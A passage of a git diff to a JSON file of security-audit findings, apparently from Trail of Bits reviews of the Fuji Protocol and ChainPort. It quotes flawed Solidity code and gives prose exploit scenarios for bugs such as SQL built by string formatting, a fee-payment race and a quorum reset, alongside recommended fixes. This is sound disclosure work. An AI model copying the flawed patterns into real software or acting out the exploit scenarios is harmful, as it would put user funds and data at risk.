for other instances of hard-coded strings where constants could be used instead. Create Semgrep rules to ensure that developers never use hard-coded strings where constants are available.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1260,29 +1260,29 @@ ] }, { - "title": "5.
Preconditions specified in docstrings are not checked by functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The docstrings of several functions specify preconditions that the functions do not automatically check for. For example, the docstring of the FujiVault contract's setFactor function contains the preconditions shown in figure 5.1, but the function's body does not contain the corresponding checks shown in figure 5.2. * For safetyF; Sets Safety Factor of Vault, should be > 1, a/b * For collatF; Sets Collateral Factor of Vault, should be > 1, a/b Figure 5.1: FujiVault.sol#L469-470 require(safetyF.a > safetyF.b); ... require(collatF.a > collatF.b); Figure 5.2: The checks that are missing from FujiVault.setFactor Additionally, the docstring of the Controller contract's doRefinancing function contains the preconditions shown in figure 5.3, but the function's body does not contain the corresponding checks shown in figure 5.4. * @param _ratioB: _ratioA/_ratioB <= 1, and > 0 Figure 5.3: Controller.sol#L41 require(ratioA > 0 && ratioB > 0); require(ratioA <= ratioB); Figure 5.4: The checks that are missing from Controller.doRefinancing Exploit Scenario The setFactor function is called with values that violate its documented preconditions. Because the function does not check for these preconditions, unexpected behavior occurs. Recommendations Short term, add checks for preconditions to all functions with preconditions specified in their docstrings. Long term, ensure that all documentation and code are in sync.", + "title": "5. Use of incorrect operator in SQLAlchemy filter ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end code uses the is not operator in an SQLAlchemy query's filter. SQLAlchemy relies on the __eq__ family of methods to apply the filter; however, the is and is not operators do not trigger these methods. Therefore, only the comparison operators (== or !=) should be used. [REDACTED] Figure 5.1: chainport-backend/project/data/db/port.py#L173 We did not review whether this flaw could be used to bypass the system's business logic, so we set the severity of this issue to undetermined. Exploit Scenario An attacker exploits this flawed check to bypass the system's business logic and steal user funds. Recommendations Short term, replace the is not operator with != in the filter indicated above. Long term, to continuously monitor the codebase for reintroductions of this issue, run the python.sqlalchemy.correctness.bad-operator-in-filter.bad-operator-in-filter Semgrep rule as part of the CI/CD flow. References SQLAlchemy: Common Filter Operators Stack Overflow: Select NULL Values in SQLAlchemy", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "6. The FujiERC1155.burnBatch function implementation is incorrect ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contract's burnBatch function deducts the unscaled amount from the user's balance and from the total supply of an asset. If the liquidity index of an asset (index[assetId]) is different from its initialized value, the execution of burnBatch could result in unintended arithmetic calculations. Instead of deducting the amount value, the function should deduct the amountScaled value.
function burnBatch( address _account, uint256[] memory _ids, uint256[] memory _amounts ) external onlyPermit { require(_account != address(0), Errors.VL_ZERO_ADDR_1155); require(_ids.length == _amounts.length, Errors.VL_INPUT_ERROR); address operator = _msgSender(); uint256 accountBalance; uint256 assetTotalBalance; uint256 amountScaled; for (uint256 i = 0; i < _ids.length; i++) { uint256 amount = _amounts[i]; accountBalance = _balances[_ids[i]][_account]; assetTotalBalance = _totalSupply[_ids[i]]; amountScaled = _amounts[i].rayDiv(indexes[_ids[i]]); require(amountScaled != 0 && accountBalance >= amountScaled, Errors.VL_INVALID_BURN_AMOUNT); _balances[_ids[i]][_account] = accountBalance - amount; _totalSupply[_ids[i]] = assetTotalBalance - amount; } emit TransferBatch(operator, _account, address(0), _ids, _amounts); } Figure 6.1: FujiERC1155.sol#L218-247 Exploit Scenario The burnBatch function is called with an asset for which the liquidity index is different from its initialized value. Because amount was used instead of amountScaled, unexpected behavior occurs. Recommendations Short term, revise the burnBatch function so that it uses amountScaled instead of amount when updating a user's balance and the total supply of an asset. Long term, use the burn function in the burnBatch function to keep functionality consistent.", + "title": "6. Several functions receive the wrong number of arguments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Several functions in the chainport-backend repository are called with an incorrect number of arguments: Several functions in the /project/deprecated_files folder A call to release_tokens_by_maintainer from the rebalance_bridge function (figures 6.1 and 6.2) A call to generate_redeem_signature from the regenerate_signature function (figures 6.3 and 6.4) A call to get_next_nonce_for_public_address from the prepare_erc20_transfer_transaction function (figures 6.5 and 6.6) A call to get_cg_token_address_list from the main function of the file (likely old debugging code) [REDACTED] Figure 6.1: The release_tokens_by_maintainer function is called with four arguments, but at least five are required.
(chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L109-L114) [REDACTED] Figure 6.2: The definition of the release_tokens_by_maintainer function (chainport-backend/project/lambdas/release_tokens_by_maintainer.py#L27-L34) [REDACTED] Figure 6.3: A call to generate_redeem_signature that is missing the network_id argument (chainport-backend/project/scripts/keys_maintainers_signature/regenerate_signature.py#L38-L43) [REDACTED] Figure 6.4: The definition of the generate_redeem_signature function (chainport-backend/project/lambdas/sidechain/events_handlers/handle_burn_event.py#L46-L48) [REDACTED] Figure 6.5: A call to get_next_nonce_for_public_address that is missing the outer_session argument (chainport-backend/project/web3_cp/erc20/prepare_erc20_transfer_transaction.py#L32-L34) [REDACTED] Figure 6.6: The definition of the get_next_nonce_for_public_address function (chainport-backend/project/web3_cp/nonce.py#L19-L21) [REDACTED] Figure 6.7: A call to get_cg_token_address_list that is missing all three arguments (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L90-91) [REDACTED] Figure 6.8: The definition of the get_cg_token_address_list function (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L37) We did not review whether this flaw could be used to bypass the system's business logic, so we set the severity of this issue to undetermined. Exploit Scenario The release_tokens_by_maintainer function is called from the rebalance_bridge function with the incorrect number of arguments. As a result, the rebalance_bridge function fails if the token balance is over the threshold limit, and the tokens are not moved to a safe address. An attacker finds another flaw and is able to steal more tokens than he would have been able to if the tokens were safely stored in another account. Recommendations Short term, fix the errors presented in the description of this finding by adding the missing arguments to the function calls. Long term, run pylint or a similar static analysis tool to detect these problems (and others) before the code is committed and deployed in production. This will ensure that if the list of a function's arguments ever changes (which was likely the root cause of this problem), a call that does not match the new arguments will be flagged before the code is deployed.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "7. Error in the white paper's equation for the cost of refinancing ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The white paper uses the following equation (equation 4) to describe how the cost of refinancing is calculated: C = A + F_1 + F_2 + F_3 + F_4, where A is the amount of debt to be refinanced and is a summand of the equation. This is incorrect, as it implies that the refinancing cost is always greater than the amount of debt to be refinanced. A correct version of the equation could be C = F_1 + F_2 + F_3 + F_4, in which each F_i is an amount, or C = (F_1 + F_2 + F_3 + F_4) * A, in which each F_i is a percentage. Recommendations Short term, fix equation 4 in the white paper. Long term, ensure that the equations in the white paper are correct and in sync with the implementation.", + "title": "7. Lack of events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Several critical operations do not trigger events.
As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setSignatoryAddress function, which is called in the Validator contract to set the signatory address, does not emit an event providing confirmation of that operation to the contract's caller (figure 7.1). [REDACTED] Figure 7.1: The setSignatoryAddress function in Validator:43-52 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to compromise a quorum of the ChainPort congress voters contract. She then sets a new signatory address. Alice, a ChainPort team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1290,99 +1290,99 @@ ] }, { - "title": "8. Errors in the white paper's equation for index calculation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The white paper uses the following equation (equation 1) to describe how the index I_t for a given token at timestamp t is calculated: I_t = I_{t-1} + (b_{t-1} - b_t)/b_{t-1}, where b_t is the amount of the given token that the Fuji Protocol owes the provider (the borrowing protocol) at timestamp t. The index is updated only when the balance changes through the accrual of interest, not when the balance changes through borrowing or repayment operations. This means that the term (b_{t-1} - b_t)/b_{t-1} is always negative, which is incorrect, as (b_t - b_{t-1})/b_{t-1} should calculate the interest rate since the last index update. The index represents the total interest rate since the deployment of the protocol. It is the product of the various interest rates accrued on the active providers during the lifetime of the protocol (measured only during state-changing interactions with the provider): I_t = r_1 * r_2 * r_3 * ... * r_t. A user's current balance is computed by taking the user's initial stored balance, multiplying it by the current index, and dividing it by the index at the time of the creation of that user's position. The division operation ensures that the user will not owe interest that accrued before the creation of the user's position. The index provides an efficient way to keep track of interest rates without having to update each user's balance separately, which would be prohibitively expensive on Ethereum. However, interest is compounded through multiplication, not addition. The formula should use the product sign instead of the plus sign. Exploit Scenario Alice decides to use the Fuji Protocol after reading the white paper. She later learns that calculations in the white paper do not match the implementations in the protocol. Because Alice allocated her funds based on her understanding of the specification, she loses funds. Recommendations Short term, replace equation 1 in the white paper with a correct and simplified version: I_t = I_{t-1} * b_t / b_{t-1}. For more information on the simplified version, see finding TOB-FUJI-015. Long term, ensure that the equations in the white paper are correct and in sync with the implementation.
", + "title": "8. Lack of zero address checks in setter functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, in the initialize function of the ChainportMainBridge contract, developers can define the maintainer registry, the congress address for governance, and the signature validator and set their addresses to the zero address. [REDACTED] Figure 8.1: The initialize function of ChainportMainBridge.sol Failure to immediately reset an address that has been set to the zero address could result in unexpected behavior. Exploit Scenario Alice accidentally sets the ChainPort congress address to the zero address when initializing a new version of the ChainportMainBridge contract. The misconfiguration causes the system to behave unexpectedly, and the system must be redeployed once the misconfiguration is detected. Recommendations Short term, add zero-value checks to all constructor functions and for all setter arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Document any arguments that are intended to be set to the zero address, highlighting the expected values of those arguments on each chain. Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project's CI pipeline, pre-commit hooks, or build scripts.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "9. FujiERC1155.setURI does not adhere to the EIP-1155 specification ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contract's setURI function does not emit the URI event. /** * @dev Sets a new URI for all token types, by relying on the token type ID */ function setURI(string memory _newUri) public onlyOwner { _uri = _newUri; } Figure 9.1: FujiERC1155.sol#L266-268 This behavior does not adhere to the EIP-1155 specification, which states the following: Changes to the URI MUST emit the URI event if the change can be expressed with an event (i.e. it isn't dynamic/programmatic). Figure 9.2: A snippet of the EIP-1155 specification Recommendations Short term, revise the setURI function so that it emits the URI event. Long term, review the EIP-1155 specification to verify that the contracts adhere to the standard. References EIP-1155", + "title": "9. Python type annotations are missing from most functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end code uses Python type annotations; however, their use is sporadic, and most functions are missing them. Exploit Scenario The cg_rest_call function receives the exception argument without specifying its type with a Python type annotation. The get_token_details_by_cg_id function calls cg_rest_call with an object of the incorrect type, an Exception instance instead of an Exception class, causing the program to crash (figure 9.1). [REDACTED] Figure 9.1: chainport-backend/modules/coingecko/api.py#L41-L42 Recommendations Short term, add type annotations to the arguments of every function.
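For instance, in a sketch of the annotated signature (illustrative, not the actual ChainPort code), declaring that the parameter takes an exception class rather than an instance lets a static checker such as mypy catch the crash described above before runtime:

```python
from typing import Any, Type

def cg_rest_call(url: str, exception: Type[Exception]) -> Any:
    """Perform the request; raise `exception` on failure (stub)."""
    ...

cg_rest_call("https://api.example.com/coins", ValueError)      # OK
cg_rest_call("https://api.example.com/coins", ValueError(""))  # flagged by mypy
```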
This will not prevent the code from crashing or causing undefined behavior during runtime; however, it will allow developers to clearly see each argument's expected type and static analyzers to better detect type mismatches. Long term, implement checks in the CI/CD pipeline to ensure that code without type annotations is not accepted.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "10. Partial refinancing operations can break the protocol ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The white paper documents the Controller contract's ability to perform partial refinancing operations. These operations move only a fraction of debt and collateral from one provider to another to prevent unprofitable interest rate slippage. However, the protocol does not correctly support partial refinancing situations in which debt and collateral are spread across multiple providers. For example, payback and withdrawal operations always interact with the current provider, which might not contain enough funds to execute these operations. Additionally, the interest rate indexes are computed only from the debt owed to the current provider, which might not accurately reflect the interest rate across all providers. Exploit Scenario An executor performs a partial refinancing operation. Interest rates are computed incorrectly, resulting in a loss of funds for either the users or the protocol. Recommendations Short term, disable partial refinancing until the protocol supports it in all situations. Long term, ensure that functionality that is not fully supported by the protocol cannot be used by accident.", + "title": "10. Use of libraries with known vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end repository uses outdated libraries with known vulnerabilities. We used pip-audit, a tool developed by Trail of Bits with support from Google to audit Python environments and dependency trees for known vulnerabilities, and identified two known vulnerabilities in the project's dependencies (as shown in figure 10.1). [REDACTED] Figure 10.1: A list of outdated libraries in the back-end repository Recommendations Short term, update the project's dependencies to their latest versions wherever possible. Use pip-audit to confirm that no vulnerable dependencies remain. Long term, add pip-audit to the project's CI/CD pipeline. Do not allow builds to succeed with dependencies that have known vulnerabilities.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "11. Native support for ether increases the codebase's complexity ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The protocol supports ERC20 tokens and Ethereum's native currency, ether. Ether transfers follow different semantics than token transfers. As a result, many functions contain extra code, like the code shown in figure 11.1, to handle ether transfers.
if (vAssets.borrowAsset == ETH) { require(msg.value >= amountToPayback, Errors.VL_AMOUNT_ERROR); if (msg.value > amountToPayback) { IERC20Upgradeable(vAssets.borrowAsset).univTransfer( payable(msg.sender), msg.value - amountToPayback ); } } else { // Check User Allowance require( IERC20Upgradeable(vAssets.borrowAsset).allowance(msg.sender, address(this)) >= amountToPayback, Errors.VL_MISSING_ERC20_ALLOWANCE ); Figure 11.1: FujiVault.sol#L319-333 This extra code increases the codebase's complexity. Furthermore, functions will behave differently depending on their arguments. Recommendations Short term, replace native support for ether with support for ERC20 WETH. This will decrease the complexity of the protocol and the likelihood of bugs.", + "title": "11. Use of JavaScript instead of TypeScript ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The ChainPort front end is developed with JavaScript instead of TypeScript. TypeScript is a strongly typed language that compiles to JavaScript. It allows developers to specify the types of variables and function arguments, and TypeScript code will fail to compile if there are type mismatches. Contrarily, JavaScript code will crash (or worse) during runtime if there are type mismatches. In summary, TypeScript is preferred over JavaScript for the following reasons: It improves code readability; developers can easily identify variable types and the types that functions receive. It improves security by providing static type checking that catches errors during compilation. It improves support for integrated development environments (IDEs) and other tools by allowing them to reason about the types of variables. Exploit Scenario A bug in the front-end application is missed, and the code is deployed in production. The bug causes the application to crash, preventing users from using it. This bug would have been caught if the front-end application were written in TypeScript. Recommendations Short term, rewrite newer parts of the application in TypeScript. TypeScript can be used side-by-side with JavaScript in the same application, allowing it to be introduced gradually. Long term, gradually rewrite the whole application in TypeScript.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "12. Missing events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notified about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack.
Recommendations Short term, ensure that all state-changing operations emit events. Long term, use an event monitoring system like Tenderly or Defender, use Defender's automated incident response feature, and develop an incident response plan to follow in case of an emergency. 13. Indexes are not updated before all operations that require up-to-date indexes Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FUJI-013 Target: FujiVault.sol, FujiERC1155.sol, FLiquidator.sol", + "title": "12. Use of .format to create SQL queries ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back end builds SQL queries with the .format function. An attacker that controls one of the variables that the function is formatting will be able to inject SQL code to steal information or damage the database. [REDACTED] Figure 12.1: chainport-backend/project/data/db/postgres.py#L4-L24 [REDACTED] Figure 12.2: chainport-backend/project/lambdas/database_monitor/clear_lock.py#L29-L31 None of the fields described above are attacker-controlled, so we set the severity of this finding to informational. However, the use of .format to create SQL queries is an anti-pattern; parameterized queries should be used instead. Exploit Scenario A developer copies the vulnerable code to create a new SQL query. This query receives an attacker-controlled string. The attacker conducts a time-based SQL injection attack, leaking the whole database. Recommendations Short term, use parameterized queries instead of building strings with variables by hand. Long term, create or use a static analysis check that forbids this pattern. This will ensure that this pattern is never reintroduced by a less security-aware developer.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Medium" ] }, { - "title": "14. No protection against missing index updates before operations that depend on up-to-date indexes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contract's updateF1155Balances function is responsible for updating indexes. This function must be called before all operations that read indexes (TOB-FUJI-013). However, the protocol does not protect against situations in which indexes are not updated before they are read; these situations could result in incorrect accounting. Exploit Scenario Developer Bob adds a new operation that reads indexes, but he forgets to add a call to updateF1155Balances. As a result, the new operation uses outdated index values, which causes incorrect accounting. Recommendations Short term, redesign the index calculations so that they provide protection against the reading of outdated indexes. For example, the index calculation process could keep track of the last index update's block number and access indexes exclusively through a getter, which updates the index automatically, if it has not already been updated for the current block. Since ERC-1155's balanceOf and totalSupply functions do not allow side effects, this solution would require the use of different functions internally. Long term, use defensive coding practices to ensure that critical operations are always executed when required.", + "title": "13.
Many rules are disabled in the ESLint configuration ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "There are 34 rules disabled in the front-end eslint configuration. Disabling some of these rules does not cause problems, but disabling others reduces the code's security and reliability (e.g., react/no-unescaped-entities, consistent-return, no-shadow) and the code's readability (e.g., react/jsx-boolean-value, react/jsx-one-expression-per-line). Furthermore, the code contains 46 inline eslint-disable comments to disable specific rules. While disabling some of these rules in this way may be valid, we recommend adding a comment to each instance explaining why the specific rule was disabled. Recommendations Short term, create a list of rules that can be safely disabled without reducing the code's security or readability, document the justification, and enable every other rule. Fix any findings that these rules may report. For rules that are disabled with inline eslint-disable comments, include explanatory comments justifying why they are disabled.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "15. Formula for index calculation is unnecessarily complex ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Indexes are updated within the FujiERC1155 contract's updateState function, shown in figure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee. } } Figure 15.1: FujiERC1155.sol#L40-57 The code in figure 15.1 translates to the following equation: index_new = index_old * (1 + (newBalance - total) / total). Using the distributive property, we can transform this equation into the following: index_new = index_old * (total / total + (newBalance - total) / total). This version can then be simplified: index_new = index_old * ((total + newBalance - total) / total). Finally, we can simplify the equation even further: index_new = index_old * (newBalance / total). The resulting equation is simpler and more intuitively conveys the underlying idea: that the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the FujiERC1155 contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly.", + "title": "14. Congress can lose quorum after manually setting the quorum value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Proposals to the ChainPort congress must be approved by a minimum quorum of members before they can be executed. 
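Finding 12's short-term recommendation, parameterized queries, looks like the following sketch. It uses Python's standard library sqlite3 driver so that it runs anywhere; the ChainPort back end would use the same placeholder mechanism through its PostgreSQL driver (psycopg2 uses %s instead of ?), and the table and values here are illustrative:

import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE tokens (address TEXT, symbol TEXT)")
cur.execute("INSERT INTO tokens VALUES (?, ?)", ("0xabc", "PORTX"))

token_address = "0xabc' OR '1'='1"  # attacker-influenced input

# Unsafe: .format splices the value into the SQL text itself.
# cur.execute("SELECT * FROM tokens WHERE address = '{}'".format(token_address))

# Safe: the driver sends the value separately from the query text.
cur.execute("SELECT * FROM tokens WHERE address = ?", (token_address,))
print(cur.fetchall())  # []: the injection attempt matches nothing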
By default, when a new member is added to the congress, the quorum is updated to be N - 1, where N is the number of congress members. [REDACTED] Figure 14.1: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.sol#L98-L119 However, the congress has the ability to overwrite the quorum number to any nonzero number, including values larger than the current membership. [REDACTED] Figure 14.2: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.sol#L69-L77 If the congress manually lowers the quorum number and later adds a member, the quorum number will be reset to one less than the total membership. If for some reason certain members are temporarily or permanently unavailable (e.g., they are on vacation or their private keys were destroyed), the minimum quorum would not be reached. Exploit Scenario The ChainPort congress is composed of 10 members. Alice submits a proposal to reduce the minimum quorum to six members to ensure continuity while several members take vacations over a period of several months. During this period, a proposal to add Bob as a new member of the ChainPort congress is passed while Carol and Dave, two other congress members, are on vacation. This unexpectedly resets the minimum quorum to 10 members of the 11-person congress, preventing new proposals from being passed. Recommendations Short term, rewrite the code so that, when a new member is added to the congress, the minimum quorum number increases by one rather than being updated to the current number of congress members subtracted by one. Add a cap to the minimum quorum number to prevent it from being manually set to values larger than the current membership of the congress. Long term, uncouple operations for increasing and decreasing quorum values from operations for making congress membership changes. Instead, require that such operations be included as additional actions in proposals for membership changes.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "17. Docstrings do not reflect functions' implementations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The docstring of the FujiVault contract's withdraw function states the following: * @param _withdrawAmount: amount of collateral to withdraw * otherwise pass -1 to withdraw maximum amount possible of collateral (including safety factors) Figure 17.1: FujiVault.sol#L188-189 However, the maximum amount is withdrawn on any negative value, not only on a value of -1. A similar inconsistency between the docstring and the implementation exists in the FujiVault contract's payback function. Recommendations Short term, adjust the withdraw and payback functions' docstrings or their implementations to make them match. Long term, ensure that docstrings always match the corresponding function's implementation.", + "title": "15. Potential race condition could allow users to bypass PORTX fee payments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "ChainPort fees are paid either as a 0.3% fee deducted from the amount transferred or as a 0.2% fee in PORTX tokens that the user has deposited into the ChainportFeeManager contract. To determine whether a fee should be paid in the base token or in PORTX, the back end checks whether the user has a sufficient PORTX balance in the ChainportFeeManager contract. 
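The quorum-reset hazard of finding 14 is easy to model outside Solidity; a toy Python rendering of the rules as described above (not the contract code itself):

members = ["member%d" % i for i in range(10)]
quorum = len(members) - 1   # default rule: quorum is N - 1
quorum = 6                  # the congress manually lowers the quorum
members.append("bob")       # a new member is added...
quorum = len(members) - 1   # ...and the add-member rule resets quorum to N - 1
print(quorum)               # 10 of 11 members: far above the intended 6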
[REDACTED] Figure 15.1: chainport-backend/project/lambdas/fees/fees.py#L219-249 However, the ChainportFeeManager contract does not enforce an unbonding period, a period of time before users can unstake their PORTX tokens. [REDACTED] Figure 15.2: smart-contracts/contracts/ChainportFeeManager.sol#L113-L125 Since pending fee payments are generated as part of deposit, transfer, and burn events but the actual processing is handled by a separate monitor, it could be possible for a user to withdraw her PORTX tokens on-chain after the deposit event has been processed and before the fee payment transaction is confirmed, allowing her to avoid paying a fee for the transfer. Exploit Scenario Alice uses ChainPort to bridge one million USDC from the Ethereum mainnet to Polygon. She has enough PORTX deposited in the ChainportFeeManager contract to cover the $2,000 fee. She watches for the pending fee payment transaction and front-runs it to remove her PORTX from the ChainportFeeManager contract. Her transfer succeeds, but she is not required to pay the fee. Recommendations Short term, add an unbonding period preventing users from unstaking PORTX before the period has passed. Long term, ensure that deposit, transfer, and redemption operations are executed atomically with their corresponding fee payments.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "18. Harvester's getHarvestTransaction function does not revert on invalid _farmProtocolNum and harvestType values ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The Harvester contract's getHarvestTransaction function incorrectly returns claimedToken and transaction values of 0 if the _farmProtocolNum parameter is set to a value greater than 1 or if the harvestType value is set to a value greater than 2. However, the function does not revert on invalid _farmProtocolNum and harvestType values. function getHarvestTransaction(uint256 _farmProtocolNum, bytes memory _data) external view override returns (address claimedToken, Transaction memory transaction) { if (_farmProtocolNum == 0) { transaction.to = 0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimComp(address)\")), msg.sender ); claimedToken = 0xc00e94Cb662C3520282E6f5717214004A7f26888; } else if (_farmProtocolNum == 1) { uint256 harvestType = abi.decode(_data, (uint256)); if (harvestType == 0) { // claim (, address[] memory assets) = abi.decode(_data, (uint256, address[])); transaction.to = 0xd784927Ff2f95ba542BfC824c8a8a98F3495f6b5; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimRewards(address[],uint256,address)\")), assets, type(uint256).max, msg.sender ); } else if (harvestType == 1) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; transaction.data = abi.encodeWithSelector(bytes4(keccak256(\"cooldown()\"))); } else if (harvestType == 2) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"redeem(address,uint256)\")), msg.sender, type(uint256).max ); claimedToken = 0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9; } } } Figure 18.1: Harvester.sol#L13-54 Exploit Scenario Alice, an executor of the Fuji Protocol, calls getHarvestTransaction with the _farmProtocolNum parameter set to 2. As a result, rather than reverting, the function returns claimedToken and transaction values of 0. 
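The fail-closed dispatch that the next recommendation asks for can be outlined as follows (Python for illustration; the original is Solidity, and the selector strings are taken from figure 18.1):

def get_harvest_transaction(farm_protocol_num: int) -> dict:
    if farm_protocol_num == 0:
        return {"selector": "claimComp(address)"}
    elif farm_protocol_num == 1:
        return {"selector": "claimRewards(address[],uint256,address)"}
    else:
        # Revert on anything unexpected instead of silently returning zero values.
        raise ValueError(f"invalid _farmProtocolNum: {farm_protocol_num}")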
Recommendations Short term, revise getHarvestTransaction so that it reverts if it is called with invalid _farmProtocolNum or harvestType values. Long term, ensure that all functions revert if they are called with invalid values.", + "title": "16. Signature-related code lacks a proper specification and documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "ChainPort uses signatures to ensure that messages to mint and release tokens were generated by the back end. These signatures are not well documented, and the properties they attempt to provide are often unclear. For example, answers to the following questions are not obvious; we provide example answers that could be provided in the documentation of ChainPort's use of signatures: Why does the signed message contain a networkId field, and why does it have to be unique? If not, an operation to mint tokens on one chain could be replayed on another chain. Why does the signed message contain an action field? The action field prevents replay attacks in networks that have both a main and side bridge. Without this field, a signature for minting tokens could be used on a sidechain contract of the same network to release tokens. Why are both the signature and nonce checked for uniqueness in the contracts? The signatures could be represented in more than one format, which means that storing them is not enough to ensure uniqueness. Recommendations Short term, create a specification describing what the signatures protect against, what properties they attempt to provide (e.g., integrity, non-repudiation), and how these properties are provided.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "19. Lack of data validation in Controller's doRefinancing function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The Controller contract's doRefinancing function does not check the _newProvider value. Therefore, the function accepts invalid values for the _newProvider parameter. function doRefinancing( address _vaultAddr, address _newProvider, uint256 